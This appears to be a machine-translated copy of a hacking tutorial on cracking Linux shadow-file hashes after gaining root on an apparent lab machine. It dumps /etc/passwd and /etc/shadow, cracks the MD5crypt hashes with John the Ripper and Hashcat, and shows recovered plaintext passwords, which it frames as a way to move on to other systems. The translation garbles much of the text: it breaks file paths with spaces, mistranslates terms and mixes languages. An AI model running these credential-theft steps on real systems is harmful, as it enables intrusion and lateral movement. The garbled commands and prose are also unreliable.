قالب وردپرس درنا توس
Home / Tips and Tricks / How to crack a shadow hash after getting root on a Linux system «Null Byte :: WonderHowTo

How to crack a shadow hash after getting root on a Linux system «Null Byte :: WonderHowTo



After accessing a root account, the next rules of procedure use this possibility to do something more important. If the user passwords on the system can be retrieved and cracked, an attacker can use them to turn on other computers if the logon is the same across systems. There are two proven password cracking tools that can accomplish this: John the Ripper and Hashcat

Passwd & Shadow File Overview

A few files of particular interest on Linux systems are the / etc / passwd and / etc / shadow files. The / etc / passwd file contains basic information about each user account on the system, including the root user with full administrator privileges, the system service accounts, and the actual user. There are seven fields in each line of / etc / passwd. A typical line looks like this:

  msfadmin: x: 1
000: 1000: msfadmin ,,,: / home / msfadmin: / bin / bash

The first field is the user's login name. The second field has traditionally contained an encrypted password, but nowadays (unless you are extremely lucky) it only contains the letter "x" to indicate that a password has been assigned. If this field is blank, the user does not have to enter a password to log in.

The third field is the user ID, a unique number assigned to the user, followed by the group ID in the fourth field. The fifth field is usually the full name of the user, although it may be left blank. The sixth field is the user's home directory, and finally the seventh field is the default shell, which is usually set to / bin / bash.

The / etc / shadow file contains the encrypted passwords of users on the system , While the / etc / passwd file is usually readable, / etc / shadow can only be read by the root account. The shadow file also contains additional information, such as: For example, expiration dates for the password. A typical line in / etc / shadow looks like this:

  msfadmin: $ 1 $ xn10zj2c $ rt / zzCW3mLtUWA.ihZjA5 /: 14684: 0: 99999: 7 ::: 

Since we are accessing root level With our kernel exploit, we can use these files to uncover other users' passwords, hoping to move to other systems and expedite exploitation.

Cracking hashes with John the Ripper

The first thing we need to do Copy the contents of / etc / passwd and / etc / shadow into their own text files on our local machine; let's call them passwd.txt and shadow.txt respectfully

  cat / etc / passwd
root: x: 0: 0: root: / root: / bin / bash
Daemon: x: 1: 1: daemon: / usr / sbin: / bin / sh
bin: x: 2: 2: bin: / bin: / bin / sh
sys: x: 3: 3: sys: / dev: / bin / sh
sync: x: 4: 65534: sync: / bin: / bin / sync
games: x: 5: 60: games: / usr / games: / bin / sh
man: x: 6: 12: man: / var / cache / man: / bin / sh
lp: x: 7: 7: lp: / var / spool / lpd: / bin / sh
Mail: x: 8: 8: Mail: / var / Mail: / bin / sh
Messages: X: 9: 9: Messages: / var / spool / Messages: / bin / sh
uucp: x: 10: 10: uucp: / var / spool / uucp: / bin / sh
Proxy: x: 13: 13: Proxy: / bin: / bin / sh
www data: x: 33: 33: www data: / var / www: / bin / sh
Backup: x: 34: 34: Backup: / var / Backups: / bin / sh
List: x: 38: 38: mailing list manager: / var / list: / bin / sh
irc: x: 39: 39: ircd: / var / run / ircd: / bin / sh
gnats: x: 41: 41: Gnat's bug reporting system (admin): / var / lib / gnats: / bin / sh
nobody: x: 65534: 65534: nobody: / ​​nonexistent: / bin / sh
libuuid: x: 100: 101 :: / var / lib / libuuid: / bin / sh
dhcp: x: 101: 102 :: / does not exist: / bin / false
syslog: x: 102: 103 :: / home / syslog: / bin / false
klog: x: 103: 104 :: / home / klog: / bin / false
sshd: x: 104: 65534 :: / var / run / sshd: / usr / sbin / nologin
msfadmin: x: 1000: 1000: msfadmin ,,,: / home / msfadmin: / bin / bash
bind: x: 105: 113 :: / var / cache / bind: / bin / false
postfix: x: 106: 115 :: / var / spool / postfix: / bin / false
ftp: x: 107: 65534 :: / home / ftp: / bin / false
postgres: x: 108: 117: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash
mysql: x: 109: 118: mysql server ,,,: / var / lib / mysql: / bin / false
tomcat55: x: 110: 65534 :: / usr / divide / tomcat5.5: / bin / false
distccd: x: 111: 65534 :: /: / bin / false
user: x: 1001: 1001: only one user, 111 ,,: / home / user: / bin / bash
Service: x: 1002: 1002: ,,,: / home / service: / bin / bash
telnetd: x: 112: 120 :: / not available: / bin / false
proftpd: x: 113: 65534 :: / var / run / proftpd: / bin / false
statd: x: 114: 65534 :: / var / lib / nfs: / bin / false 
  cat / etc / shadow
Root: $ 1 $ / avpfBJ1 $ x0z8w5UF9Iv. / DR9E9Lid .: 14747: 0: 99999: 7 :::
Daemon: *: 14684: 0: 99999: 7 :::
am: *: 14684: 0: 99999: 7 :::
sys: $ 1 $ fUX6BPoT $ Miyc3UpOzQJqz4s5wFD9l0: 14742: 0: 99999: 7 :::
sync: *: 14684: 0: 99999: 7 :::
Games: *: 14684: 0: 99999: 7 :::
Man: *: 14684: 0: 99999: 7 :::
LP: *: 14684: 0: 99999: 7 :::
Mail: *: 14684: 0: 99999: 7 :::
Messages: *: 14684: 0: 99999: 7 :::
UUCP: *: 14684: 0: 99999: 7 :::
Proxy: *: 14684: 0: 99999: 7 :::
www data: *: 14684: 0: 99999: 7 :::
Backup: *: 14684: 0: 99999: 7 :::
List: *: 14684: 0: 99999: 7 :::
IRC: *: 14684: 0: 99999: 7 :::
Mosquitoes: *: 14684: 0: 99999: 7 :::
nobody: *: 14684: 0: 99999: 7 :::
libuuid:!: 14684: 0: 99999: 7 :::
dhcp: *: 14684: 0: 99999: 7 :::
syslog: *: 14684: 0: 99999: 7 :::
klog: $ 1 $ f2ZVMS4K $ R9XkI.CmLdHhdUE3X9jqP0: 14742: 0: 99999: 7 :::
sshd: *: 14684: 0: 99999: 7 :::
msfadmin: $ 1 $ XN10Zj2c $ Rt / zzCW3mLtUWA.ihZjA5 /: 14684: 0: 99999: 7 :::
bind: *: 14685: 0: 99999: 7 :::
Postfix: *: 14685: 0: 99999: 7 :::
ftp: *: 14685: 0: 99999: 7 :::
postgres: $ 1 $ Rw35ik.x $ MgQgZUuO5pAoUvfJhfcYe /: 14685: 0: 99999: 7 :::
mysql:!: 14685: 0: 99999: 7 :::
tomcat55: *: 14691: 0: 99999: 7 :::
distccd: *: 14698: 0: 99999: 7 :::
User: $ 1 $ HESu9xrH $ k.o3G93DGoXIiQKkPmUgZ0: 14699: 0: 99999: 7 :::
Service: $ 1 $ kR3ue7JZ $ 7GxELDupr5Ohp6cjZ3Bu //: 14715: 0: 99999: 7 :::
telnetd: *: 14715: 0: 99999: 7 :::
proftpd:!: 14727: 0: 99999: 7 :::
statd: *: 15474: 0: 99999: 7 ::: 

John the Ripper is a popular password-detection tool that supports many common hash types and a useful autodetect feature. It has been around for some time and continues to be one of the strongest and easiest to use available crackers.

Before we can inject the obtained hashes into John, we need to combine a utility called unshadow to put the passwd and shadow files into a format that John can read. Run the following command to merge the data into a new text file called passwords.txt:

  unshadow passwd.txt shadow.txt> passwords.txt 

John can work independently by just typing john plus any file you use for typing, but it's often much more useful to supply a word list. There are a few word lists available in the / usr / share / wordlists directory, but at the moment we are using sqlmap.txt since it's a pretty nice list. Use the flag – wordlist to specify the list to use and submit the input file:

  john --wordlist = / usr / share / wordlists / sqlmap.txt passwords.txt
Warning: Detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the option "--format = aix-smd5" to force the loading of these types
Using standard input encoding: UTF-8
7 password hashes loaded with 7 different salts (md5crypt, crypt (3) $ 1 $ [MD5 128/128 SSE2 4x3])
Remaining 1 password hash
Press & # 39; q & # 39; or Ctrl-C to cancel almost any other button for the status
0g 0: 00: 00: 51 DONE (2018-08-06 14:10) 0g / s 27478p / s 27478c / s 27478C / s Zzzzzzz1..zzzzzzzzzzzzzzz
Session Completed 

We can see that John recognizes the type of hash used as md5crypt, also known as aix-smd5, and after some time it successfully completes the session. Now we can use the flag – show to display the cracked passwords that John has successfully recovered:

  john --show passwords.txt
sys: batman: 3: 3: sys: / dev: / bin / sh
klog: 123456789: 103: 104 :: / home / klog: / bin / false
mspfadmin: msfadmin: 1000: 1000: msfdmin ,,,: / home / msfadmin: / bin / bash
postgres: postgres: 108: 117: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash
user: user: 1001: 1001: only one user, 111 ,,: / home / user: / bin / bash
Service: Service: 1002: 1002: ,,,: / home / service: / bin / bash

6 password hashes cracked, 1 left 

After the user name in the first field we now see the clear text password in the second field. It tells us that six out of seven password hashes were cracked; Depending on the hardware used, the word list supplied and the length and complexity of the passwords, different levels of success are achieved.

Cracking Hashes with Hashcat

The next tool we'll look at is Hashcat. This is an extremely powerful hash cracking tool with a lot of features and both CPU-based and GPU-based versions. From Hashcat v3.00, the CPU and GPU tools have been merged, with the pure CPU version becoming Hashcat legacy.

Unlike John, the simplest way to use Hashcat is to self-provision the password washes. Copy all the hashes we want to crack into a new text file that we call hashes.txt :

  cat hashes.txt
$ 1 $ / avpfBJ1 $ x0z8w5UF9Iv. / DR9E9Lid.
$ 1 $ fUX6BPoT $ Miyc3UpOzQJqz4s5wFD9l0
$ 1 $ f2ZVMS4K $ R9XkI.CmLdHhdUE3X9jqP0
$ 1 $ XN10Zj2c $ Rt / zzCW3mLtUWA.ihZjA5 /
$ 1 $ Rw35ik.x $ MgQgZUuO5pAoUvfJhfcYe /
$ 1 $ HESu9xrH $ k.o3G93DGoXIiQKkPmUgZ0
$ 1 $ kR3ue7JZ $ 7GxELDupr5Ohp6cjZ3Bu // 

Hashcat contains many modes that can be executed depending on the type of hash you are using. We saw earlier that John identified our shadow hashes as md5crypt, so we can type hashcat –help to see all options for this tool and the various modes available. In the list we find that md5crypt mode is 500:

  0500 | md5crypt, MD5 (Unix), Cisco IOS $ 1 $ (MD5) | operating systems
3200 | bcrypt $ 2 * $, Blowfish (Unix) | operating systems
7400 | sha256crypt $ 5 $, SHA256 (Unix) | operating systems
1800 | sha512crypt $ 6 $, SHA512 (unix) | operating systems
122 | MacOS v10.4, MacOS v10.5, MacOS v10.6 | operating systems
1722 | macOS v10.7 | operating systems
7100 | macOS v10.8 + (PBKDF2-SHA512) | Operating Systems 

Run the following command to start cracking:

  hashcat -m 500 -a 0 -o cracked.txt hashes.txt /usr/share/wordlists/sqlmap.txt -O
Hashcat (v4.1.0) starts ...

* Device # 2: No native Intel OpenCL runtime. Expect massive speed loss.
You can use --force to override, but you can not report any related errors.
OpenCL Platform # 1: Intel (R) Corporation
=========================================
* Device # 1: Intel (R) Core (TM) i5 CPU M 480 @ 2.67GHz, 934/3736 MB assignable, 4MCU

OpenCL Platform # 2: The Pocl Project
===================================
* Device # 2: pthread-Intel® Core ™ i5 CPU M 480 @ 2.67GHz, skipped.

Hashes: 7 outcrops; 7 unique outcrops, 7 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotated
Rules: 1

Applicable optimizers:
* Optimized kernel
* Zero byte 

Let's break this down.

  • The flag -m indicates the mode we want to use.
  • The -a flag determines the type of attack In this case 0 as a standard straight fashion.
  • Then we specify the output file as cracked.txt with the -o flag in hashes.txt as our input file containing the hashes. We can also use a word list, as we did with John earlier.
  • Finally, the -O flag allows optimized kernels (depending on the system used, it may or may not be required) I know that it limits the password length.

While running Hashcat we can check the progress at any time by simply entering s to display the status:

  [s] tatus [p] use [b] ypass [c] heckpoint [q] uit => s

Session ..........: hashcat
Status ...........: is running
Hash.Type ........: MD5crypt, MD5 (Unix), Cisco IOS $ 1 $ (MD5)
Hash.Target ......: hashes.txt
Time.Started .....: Mon 6. Aug. 14:18:10 2018 (30 Sec.)
Time. Estimated ...: Mon Aug 6 14:21:08 2018 (2 minutes, 28 seconds)
Guess.Base .......: file (/usr/share/wordlists/sqlmap.txt)
Guess.Queue ......: 1/1 (100.00%)
Geschwindigkeit.Dev. # 1 .....: 15816 H / s (7.84ms) @ Accel: 256 Loops: 125 Thr: 1 Vec: 4
Restored ........: 5/7 (71.43%) digests, 5/7 (71.43%) salts
Progress .........: 1648627/9845703 (16.74%)
Rejected .........: 3059/1648627 (0.19%)
Restore.Point ....: 234929/1406529 (16.70%)
Candidates # 1 ....: 9dH8eJEs -> 9notes
HWMon.Dev. # 1 .....: N / A 

Once the process is almost complete, a message is displayed, followed by some information such as speed, number of hashes recovered, and start and stop times.

  Approaching the final key area - workload adjusted.

Session ..........: hashcat
Status ...........: Exhausted
Hash.Type ........: MD5crypt, MD5 (Unix), Cisco IOS $ 1 $ (MD5)
Hash.Target ......: hashes.txt
Time.Started .....: Mon Aug 6th 14:18:10 2018 (2 minutes, 59 seconds)
Time. Estimated ...: Mon Aug 6th 14:21:09 2018 (0 sec.)
Guess.Base .......: file (/usr/share/wordlists/sqlmap.txt)
Guess.Queue ......: 1/1 (100.00%)
Speed.Dev. # 1 .....: 15738 H / s (8.15ms) @ Accel: 256 Loops: 125 Thr: 1 Vec: 4
Restored ........: 5/7 (71.43%) digests, 5/7 (71.43%) salts
Progress .........: 9845703/9845703 (100,00%)
Rejected .........: 30891/9845703 (0.31%)
Restore.Point ....: 1406529/1406529 (100.00%)
Candidate # 1 ....: zzbell0506 -> zzzzzzzzzzzzzzz
HWMon.Dev. # 1 .....: N / A

Start: Mon. 6th August 14:18:06 2018
Stopped: Mon Aug 6 14:21:10 2018 

Now we can display the contents of cracked.txt and display the passwords in plain text:

  cat cracked.txt
$ 1 $ fUX6BPoT $ Miyc3UpOzQJqz4s5wFD9l0: Batman
$ 1 $ Rw35ik.x $ MgQgZUuO5pAoUvfJhfcYe /: postgres
$ 1 $ kR3ue7JZ $ 7GxELDupr5Ohp6cjZ3Bu //: Service
$ 1 $ HESu9xrH $ k.o3G93DGoXIiQKkPmUgZ0: Users 

Online Hash Cracking

The prevalence of cloud technologies and distributed computing brings a whole new perspective to password cracking. Most hackers run a virtual machine, a laptop, or at best a powerful desktop computer, but many online services use dedicated servers and resources to crack hashes. Websites like CrackStation, Online Hash Crack and MD5 / Sha1 Hash Cracker provide the convenience of password cracking directly from the browser. None of these seemed to support the md5crypt hashes we had, but it's easy to find support for many common hash formats like MD5, SHA1, and LM.

One quick note: If you can not find the right hash for online format, or if you just want to save some time, it's certainly safe to contact Google. Sometimes, if you're just looking for the exact hash you're trying to crack, you can get results. The probability is high if the password is a default or generic password, or if it is a hash that was previously cracked. You can find it in the search results. A quick Google search could save you a lot of time and effort.

Wrapping Up

In this series, we learned how to use Metasploit to compromise a web server and get a low-level shell. used a kernel exploit to perform a local rights escalation and get root-level access, cracking some password hashes with John the Ripper and Hashcat. Often a system can be operated with this exact same process, just with different exploits and attack vectors. Now that you have more tools and techniques, go out and train. Happy hacking!

Do not miss: Use beginner's python to create a brutal tool for SHA-1 hashes

Cover image of succo / Pixabay; Screenshots of drd_ / zero byte

Source link